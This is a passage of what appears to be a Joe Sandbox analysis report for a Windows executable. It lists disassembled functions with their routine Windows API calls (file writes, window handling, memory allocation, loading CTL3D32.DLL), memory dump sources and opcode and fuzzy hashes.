                                                                                Function 00406F18 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 3202724764-0
                                                                                • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID:
                                                                                • API String ID: 530164218-0
                                                                                • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                Function 0042CD34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                                                • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                                                Function 00466EAC Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                Function 00406EC8 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                Function 00450918 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                  • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                                                • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                                                Function 004072B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                Function 0042E3FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                Function 00448738 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                                                • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                                                Function 0047DA48 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 626452242-0
                                                                                • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                                                • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                                                Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                                • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                                                Function 00452FB0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                                                • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                                                Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                Function 00406F50 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                • Instruction Fuzzy Hash:

                                                                                Non-executed Functions

                                                                                Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
